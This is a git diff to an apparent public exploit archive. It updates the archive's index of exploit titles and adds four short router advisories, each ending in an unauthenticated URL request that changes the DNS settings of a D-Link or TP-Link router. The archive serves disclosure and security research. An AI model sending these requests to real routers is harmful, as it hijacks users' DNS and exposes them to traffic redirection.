+36945,platforms/hardware/remote/36945.txt,"TP-LINK TL-WR740N 111130 - 'ping_addr' Parameter HTML Injection Vulnerability",2012-03-12,l20ot,hardware,remote,0 36946,platforms/php/webapps/36946.txt,"Wikidforum 2.10 Advanced Search Multiple Field SQL Injection",2012-03-12,"Stefan Schurtz",php,webapps,0 36947,platforms/php/webapps/36947.txt,"Wikidforum 2.10 Search Field XSS",2012-03-12,"Stefan Schurtz",php,webapps,0 36948,platforms/php/webapps/36948.txt,"Wikidforum 2.10 Advanced Search Multiple Field XSS",2012-03-12,"Stefan Schurtz",php,webapps,0 @@ -33397,8 +33397,8 @@ id,file,description,date,author,platform,type,port 37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - SQL Injection",2015-05-13,"Wad Deek",php,webapps,0 37007,platforms/linux/remote/37007.txt,"AtMail 1.04 Multiple Security Vulnerabilities",2012-03-22,"Yury Maryshev",linux,remote,0 37008,platforms/php/webapps/37008.txt,"Event Calendar PHP 'cal_year' Parameter Cross Site Scripting Vulnerability",2012-03-24,3spi0n,php,webapps,0 -37009,platforms/java/webapps/37009.xml,"Apache Struts 2.0 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability",2012-03-23,voidloafer,java,webapps,0 -37010,platforms/php/webapps/37010.txt,"Zumset.com FbiLike 1.00 'id' Parameter Cross Site Scripting Vulnerability",2012-03-25,Crim3R,php,webapps,0 +37009,platforms/java/webapps/37009.xml,"Apache Struts 2.0 - 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability",2012-03-23,voidloafer,java,webapps,0 +37010,platforms/php/webapps/37010.txt,"Zumset.com FbiLike 1.00 - 'id' Parameter Cross Site Scripting Vulnerability",2012-03-25,Crim3R,php,webapps,0 37011,platforms/php/webapps/37011.txt,"Geeklog 1.8.1 'index.php' SQL Injection Vulnerability",2012-03-27,HELLBOY,php,webapps,0 37012,platforms/php/webapps/37012.txt,"NextBBS 0.6 ajaxserver.php Multiple Function SQL Injection",2012-03-27,waraxe,php,webapps,0 37013,platforms/php/webapps/37013.txt,"NextBBS 0.6 index.php do Parameter XSS",2012-03-27,waraxe,php,webapps,0 @@ -33414,7 +33414,7 @@ id,file,description,date,author,platform,type,port 37023,platforms/php/webapps/37023.txt,"EasyPHP 'main.php' SQL Injection Vulnerability",2012-03-29,"Skote Vahshat",php,webapps,0 37024,platforms/php/webapps/37024.txt,"eZ Publish 4.x 'ezjscore' Module Cross Site Scripting Vulnerability",2012-03-29,"Yann MICHARD",php,webapps,0 37025,platforms/php/webapps/37025.txt,"PHP Designer 2007 - Personal Multiple SQL Injection Vulnerabilities",2012-03-30,MR.XpR,php,webapps,0 -37026,platforms/php/webapps/37026.txt,"e107 1.0 'view' Parameter SQL Injection Vulnerability",2012-03-30,Am!r,php,webapps,0 +37026,platforms/php/webapps/37026.txt,"e107 1.0 - 'view' Parameter SQL Injection Vulnerability",2012-03-30,Am!r,php,webapps,0 37027,platforms/php/webapps/37027.txt,"Simple Machines Forum (SMF) 2.0.2 index.php scheduled Parameter XSS",2012-03-29,Am!r,php,webapps,0 37028,platforms/php/webapps/37028.txt,"JamWiki 1.1.5 'num' Parameter Cross Site Scripting Vulnerability",2012-03-30,"Sooraj K.S",php,webapps,0 37029,platforms/java/webapps/37029.txt,"ManageEngine Firewall Analyzer 7.2 fw/index2.do Multiple Parameter XSS",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 @@ -33449,13 +33449,13 @@ id,file,description,date,author,platform,type,port 37058,platforms/multiple/webapps/37058.txt,"OYO File Manager 1.1 iOS&Android - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,multiple,webapps,8080 37059,platforms/windows/webapps/37059.html,"ManageEngine EventLog Analyzer 10.0 Build 10001 CSRF Vulnerability",2015-05-18,"Akash S. Chavan",windows,webapps,0 37061,platforms/multiple/dos/37061.txt,"Sony Bravia KDL-32CX525 'hping' Command Remote Denial Of Service Vulnerability",2012-04-05,"Gabriel Menezes Nunes",multiple,dos,0 -37062,platforms/php/webapps/37062.txt,"VBulletin 4.1.10 'announcementid' Parameter SQL Injection Vulnerability",2012-04-04,Am!r,php,webapps,0 +37062,platforms/php/webapps/37062.txt,"VBulletin 4.1.10 - 'announcementid' Parameter SQL Injection Vulnerability",2012-04-04,Am!r,php,webapps,0 37063,platforms/php/webapps/37063.txt,"WordPress TagGator 'tagid' Parameter SQL Injection Vulnerability",2012-04-05,Am!r,php,webapps,0 37064,platforms/win64/local/37064.py,"Windows 8.0 - 8.1 x64 - TrackPopupMenu Privilege Escalation (MS14-058)",2015-05-19,ryujin,win64,local,0 37066,platforms/hardware/remote/37066.py,"Phoenix Contact ILC 150 ETH PLC Remote Control Script",2015-05-20,Photubias,hardware,remote,0 37067,platforms/php/webapps/37067.txt,"WordPress FeedWordPress Plugin 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80 37068,platforms/windows/dos/37068.py,"ZOC SSH Client Buffer Overflow Vulnerability (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0 -37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 execve ""/bin/sh"" - shellcode 26 bytes",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0 +37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 execve _/bin/sh_ - shellcode 26 bytes",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0 37070,platforms/php/webapps/37070.txt,"WordPress Uploadify Integration Plugin 0.9.6 Multiple Cross Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0 37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 Local File Include and SQL Injection Vulnerabilities",2012-04-09,wacky,php,webapps,0 37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities",2012-04-10,"Chokri B.A",php,webapps,0 @@ -33483,7 +33483,7 @@ id,file,description,date,author,platform,type,port 37093,platforms/php/webapps/37093.txt,"XOOPS 2.5.4 /tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php Multiple Parameter XSS",2012-04-18,"High-Tech Bridge SA",php,webapps,0 37094,platforms/php/webapps/37094.txt,"ownCloud 3.0.0 index.php redirect_url Parameter Arbitrary Site Redirect",2012-04-18,"Tobias Glemser",php,webapps,0 37095,platforms/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 'username' Parameter Cross Site Scripting Vulnerability",2012-04-20,sonyy,php,webapps,0 -37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0 +37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0 37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass and Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0 37098,platforms/windows/local/37098.txt,"Microsoft Windows - Local Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0 37100,platforms/php/webapps/37100.txt,"Waylu CMS 'products_xx.php' SQL Injection and HTML Injection Vulnerabilities",2012-04-20,TheCyberNuxbie,php,webapps,0 @@ -33491,7 +33491,7 @@ id,file,description,date,author,platform,type,port 37102,platforms/php/webapps/37102.txt,"Joomla! Video Gallery component Local File Include and SQL Injection Vulnerabilities",2012-04-24,KedAns-Dz,php,webapps,0 37103,platforms/php/webapps/37103.txt,"concrete5 5.5.2.1 Information Disclosure_ SQL Injection and Cross Site Scripting Vulnerabilities",2012-04-26,"Jakub Galczyk",php,webapps,0 37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 'jsoncallback' Parameter Cross Site Scripting Vulnerability",2012-04-26,"Jakub Galczyk",php,webapps,0 -37105,platforms/php/webapps/37105.txt,"Quick.CMS 4.0 'p' Parameter Cross Site Scripting Vulnerability",2012-04-26,"Jakub Galczyk",php,webapps,0 +37105,platforms/php/webapps/37105.txt,"Quick.CMS 4.0 - 'p' Parameter Cross Site Scripting Vulnerability",2012-04-26,"Jakub Galczyk",php,webapps,0 37106,platforms/php/webapps/37106.txt,"Wordpress Video Gallery Plugin 2.8 Arbitrary Mail Relay",2015-05-26,"Claudio Viviani",php,webapps,80 37107,platforms/php/webapps/37107.txt,"WordPress NewStatPress Plugin 0.9.8 Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 37108,platforms/php/webapps/37108.txt,"WordPress Landing Pages Plugin 1.8.4 Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 @@ -33523,7 +33523,7 @@ id,file,description,date,author,platform,type,port 37134,platforms/php/webapps/37134.php,"MySQLDumper 1.24.4 'menu.php' Remote PHP Code Execution Vulnerability",2012-04-27,AkaStep,php,webapps,0 37135,platforms/hardware/webapps/37135.txt,"iGuard Security Access Control Device Firmware 3.6.7427A Cross Site Scripting Vulnerability",2012-05-02,"Usman Saeed",hardware,webapps,0 37136,platforms/php/webapps/37136.txt,"Trombinoscope 3.x 'photo.php' Server SQL Injection Vulnerability",2012-05-07,"Ramdan Yantu",php,webapps,0 -37137,platforms/php/webapps/37137.txt,"Schneider Electric Telecontrol Kerweb 3.0.0/6.0.0 'kw.dll' HTML Injection Vulnerability",2012-05-06,phocean,php,webapps,0 +37137,platforms/php/webapps/37137.txt,"Schneider Electric Telecontrol Kerweb 3.0.0/6.0.0 - 'kw.dll' HTML Injection Vulnerability",2012-05-06,phocean,php,webapps,0 37138,platforms/php/webapps/37138.txt,"Ramui Forum Script 'query' Parameter Cross Site Scripting Vulnerability",2012-05-07,3spi0n,php,webapps,0 37139,platforms/php/webapps/37139.txt,"JibberBook 2.3 'Login_form.php' Authentication Security Bypass Vulnerability",2012-05-07,L3b-r1'z,php,webapps,0 37140,platforms/php/webapps/37140.html,"PHP Enter 4.1.2 'banners.php' PHP Code Injection Vulnerability",2012-05-08,L3b-r1'z,php,webapps,0 @@ -33545,7 +33545,7 @@ id,file,description,date,author,platform,type,port 37157,platforms/php/webapps/37157.txt,"GetSimple CMS 3.1 admin/pages.php error Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 37158,platforms/php/webapps/37158.txt,"GetSimple CMS 3.1 admin/index.php Multiple Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 37159,platforms/php/webapps/37159.txt,"GetSimple CMS 3.1 admin/upload.php path Parameter XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 -37160,platforms/windows/dos/37160.pl,"Universal Reader 1.16.740.0 'uread.exe' Denial Of Service Vulnerability",2012-05-14,demonalex,windows,dos,0 +37160,platforms/windows/dos/37160.pl,"Universal Reader 1.16.740.0 - 'uread.exe' Denial Of Service Vulnerability",2012-05-14,demonalex,windows,dos,0 37161,platforms/php/webapps/37161.txt,"WordPress GRAND Flash Album Gallery 1.71 'admin.php' Cross Site Scripting Vulnerability",2012-05-15,"Heine Pedersen",php,webapps,0 37162,platforms/php/webapps/37162.txt,"Dynamic Widgets WordPress Plugin 1.5.1 'themes.php' Cross Site Scripting Vulnerability",2012-05-15,"Heine Pedersen",php,webapps,0 37163,platforms/windows/remote/37163.py,"IBM Security AppScan Standard <= 9.0.2 - OLE Automation Array Remote Code Execution",2015-06-01,"Naser Farhadi",windows,remote,0 @@ -33601,10 +33601,14 @@ id,file,description,date,author,platform,type,port 37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye <= 2.5.7 and Crucible <= 2.5.7 Plugins XML Parsing Unspecified Security Vulnerability",2012-05-17,anonymous,jsp,webapps,0 37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 /admin/file_manager/file_upload_submit.asp Multiple Parameter File Upload ASP Code Execution",2012-05-21,"Aung Khant",asp,webapps,0 37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 /admin/file_manager/browse.asp path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0 -37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 'text' Parameter Cross Site Scripting Vulnerability",2012-05-21,MustLive,php,webapps,0 +37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Parameter Cross Site Scripting Vulnerability",2012-05-21,MustLive,php,webapps,0 37225,platforms/php/webapps/37225.pl,"concrete5 concrete/js/tiny_mce/plugins/spellchecker/rpc.php Remote DoS",2012-05-20,AkaStep,php,webapps,0 37226,platforms/php/webapps/37226.txt,"concrete5 FlashUploader Arbitrary SWF File Upload",2012-05-20,AkaStep,php,webapps,0 37227,platforms/php/webapps/37227.txt,"concrete5 index.php/tools/required/files/replace searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37229,platforms/php/webapps/37229.txt,"concrete5 index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37230,platforms/php/webapps/37230.txt,"concrete5 index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0 +37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 +37238,platforms/hardware/webapps/37238.txt,"TP-Link ADSL2+ TD-W8950ND - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 +37240,platforms/hardware/webapps/37240.txt,"D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 +37241,platforms/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 diff --git a/platforms/hardware/webapps/37237.txt b/platforms/hardware/webapps/37237.txt new file mode 100755 index 000000000..c2145db25 --- /dev/null +++ b/platforms/hardware/webapps/37237.txt @@ -0,0 +1,31 @@ + D-Link DSL-2780B DLink_1.01.14 + Unauthenticated Remote DNS Change + + Copyright 2015 (c) Todor Donev + + http://www.ethical-hacker.org/ + https://www.facebook.com/ethicalhackerorg + + No description for morons, + script kiddies & noobs !! + + Disclaimer: + This or previous programs is for Educational + purpose ONLY. Do not use it without permission. + The usual disclaimer applies, especially the + fact that Todor Donev is not liable for any + damages caused by direct or indirect use of the + information or functionality provided by these + programs. The author or any Internet provider + bears NO responsibility for content or misuse + of these programs or any derivatives thereof. + By using these programs you accept the fact + that any damage (dataloss, system crash, + system compromise, etc.) caused by the use + of these programs is not Todor Donev's + responsibility. + + Use them at your own risk! + + +[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1" 0&> /dev/null <&1 diff --git a/platforms/hardware/webapps/37238.txt b/platforms/hardware/webapps/37238.txt new file mode 100755 index 000000000..39eda3f93 --- /dev/null +++ b/platforms/hardware/webapps/37238.txt @@ -0,0 +1,31 @@ + TP-Link ADSL2+ TD-W8950ND + Unauthenticated Remote DNS Change + + Copyright 2015 (c) Todor Donev + + http://www.ethical-hacker.org/ + https://www.facebook.com/ethicalhackerorg + + No description for morons, + script kiddies & noobs !! + + Disclaimer: + This or previous programs is for Educational + purpose ONLY. Do not use it without permission. + The usual disclaimer applies, especially the + fact that Todor Donev is not liable for any + damages caused by direct or indirect use of the + information or functionality provided by these + programs. The author or any Internet provider + bears NO responsibility for content or misuse + of these programs or any derivatives thereof. + By using these programs you accept the fact + that any damage (dataloss, system crash, + system compromise, etc.) caused by the use + of these programs is not Todor Donev's + responsibility. + + Use them at your own risk! + + +[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1 diff --git a/platforms/hardware/webapps/37240.txt b/platforms/hardware/webapps/37240.txt new file mode 100755 index 000000000..77ffd49e2 --- /dev/null +++ b/platforms/hardware/webapps/37240.txt @@ -0,0 +1,39 @@ + D-Link DSL-2730B AU_2.01 + Authentication Bypass DNS Change + + Copyright 2015 (c) Todor Donev + + http://www.ethical-hacker.org/ + https://www.facebook.com/ethicalhackerorg + + Disclaimer: + This or previous programs is for Educational + purpose ONLY. Do not use it without permission. + The usual disclaimer applies, especially the + fact that Todor Donev is not liable for any + damages caused by direct or indirect use of the + information or functionality provided by these + programs. The author or any Internet provider + bears NO responsibility for content or misuse + of these programs or any derivatives thereof. + By using these programs you accept the fact + that any damage (dataloss, system crash, + system compromise, etc.) caused by the use + of these programs is not Todor Donev's + responsibility. + + Use them at your own risk! + + This security hole allows an attacker to bypass + authentication and change the DNS. When the + administrator is logged in the web management + interface, an attacker may be able to completely + bypass authentication phase and connect to the + web management interface with administrator's + credentials. This attack can also be performed + by an external attacker who connects to the + router's public IP address, if remote management + is enabled. To change the DNS without logging + into web management interface use the following URL: + +http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList= diff --git a/platforms/hardware/webapps/37241.txt b/platforms/hardware/webapps/37241.txt new file mode 100755 index 000000000..5d2acf790 --- /dev/null +++ b/platforms/hardware/webapps/37241.txt @@ -0,0 +1,31 @@ + D-Link DSL-526B ADSL2+ AU_2.01 + Unauthenticated Remote DNS Change + + Copyright 2015 (c) Todor Donev + + http://www.ethical-hacker.org/ + https://www.facebook.com/ethicalhackerorg + + No description for morons, + script kiddies & noobs !! + + Disclaimer: + This or previous programs is for Educational + purpose ONLY. Do not use it without permission. + The usual disclaimer applies, especially the + fact that Todor Donev is not liable for any + damages caused by direct or indirect use of the + information or functionality provided by these + programs. The author or any Internet provider + bears NO responsibility for content or misuse + of these programs or any derivatives thereof. + By using these programs you accept the fact + that any damage (dataloss, system crash, + system compromise, etc.) caused by the use + of these programs is not Todor Donev's + responsibility. + + Use them at your own risk! + +[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" | grep "var dns2" + var dns2 = '8.8.8.8'; diff --git a/platforms/linux/local/40.pl b/platforms/linux/local/40.pl index 713d67edf..8937a3f86 100755 --- a/platforms/linux/local/40.pl +++ b/platforms/linux/local/40.pl @@ -42,6 +42,6 @@ $buffer2 .= $newret; exec("mail -s wow -c $buffer2 root@localhost"); #EOF - - -# milw0rm.com [2003-06-10] + + +# milw0rm.com [2003-06-10] diff --git a/platforms/linux/remote/38.pl b/platforms/linux/remote/38.pl index 755c2e64f..06b1f12da 100755 --- a/platforms/linux/remote/38.pl +++ b/platforms/linux/remote/38.pl @@ -212,6 +212,6 @@ sub mychomp { $data = substr($arg, 0, length($arg) - $CRLF); return $data; } - - -# milw0rm.com [2003-06-08] + + +# milw0rm.com [2003-06-08] diff --git a/platforms/windows/dos/3030.html b/platforms/windows/dos/3030.html index b05a98d19..38f9e2f15 100755 --- a/platforms/windows/dos/3030.html +++ b/platforms/windows/dos/3030.html @@ -1,50 +1,50 @@ -
------------------------------------------------------------------------------
- RealPlayer 10.5 ierpplug.dll multiple methods Denial of Service
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
-
-
-
-
- -# milw0rm.com [2006-12-28] +
+-----------------------------------------------------------------------------
+ RealPlayer 10.5 ierpplug.dll multiple methods Denial of Service
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+-----------------------------------------------------------------------------
+
+
+
+
+
+
+
+
+
+
+
+
+ +# milw0rm.com [2006-12-28] diff --git a/platforms/windows/dos/3041.html b/platforms/windows/dos/3041.html index b73433060..5ced21ff7 100755 --- a/platforms/windows/dos/3041.html +++ b/platforms/windows/dos/3041.html @@ -1,23 +1,23 @@ - - - - - - -# milw0rm.com [2006-12-29] + + + + + + +# milw0rm.com [2006-12-29] diff --git a/platforms/windows/dos/3042.html b/platforms/windows/dos/3042.html index c40c762b3..2a8aba08c 100755 --- a/platforms/windows/dos/3042.html +++ b/platforms/windows/dos/3042.html @@ -1,23 +1,23 @@ - - - - - - -# milw0rm.com [2006-12-29] + + + + + + +# milw0rm.com [2006-12-29] diff --git a/platforms/windows/dos/3155.html b/platforms/windows/dos/3155.html index 8dd4337fc..4a9cf1aee 100755 --- a/platforms/windows/dos/3155.html +++ b/platforms/windows/dos/3155.html @@ -1,25 +1,25 @@ - - - - - - - -# milw0rm.com [2007-01-18] + + + + + + + +# milw0rm.com [2007-01-18] diff --git a/platforms/windows/dos/3421.html b/platforms/windows/dos/3421.html index cc4f79e23..411464ae4 100755 --- a/platforms/windows/dos/3421.html +++ b/platforms/windows/dos/3421.html @@ -1,62 +1,62 @@ -
------------------------------------------------------------------------------
- Macromedia SwDir.dll ver. 10.1.4.20 multiple methods Stack Overflow
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
-
-
-
-
- -# milw0rm.com [2007-03-07] +
+-----------------------------------------------------------------------------
+ Macromedia SwDir.dll ver. 10.1.4.20 multiple methods Stack Overflow
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+-----------------------------------------------------------------------------
+
+
+
+
+
+
+
+
+
+
+
+
+ +# milw0rm.com [2007-03-07] diff --git a/platforms/windows/remote/3993.html b/platforms/windows/remote/3993.html index e7470924f..1a3decd0e 100755 --- a/platforms/windows/remote/3993.html +++ b/platforms/windows/remote/3993.html @@ -1,51 +1,51 @@ - - - - - - -# milw0rm.com [2007-05-26] + + + + + + +# milw0rm.com [2007-05-26] diff --git a/platforms/windows/remote/4023.html b/platforms/windows/remote/4023.html index e2a8bea0e..58b5ab811 100755 --- a/platforms/windows/remote/4023.html +++ b/platforms/windows/remote/4023.html @@ -1,24 +1,24 @@ - - - - - - -# milw0rm.com [2007-06-02] + + + + + + +# milw0rm.com [2007-06-02]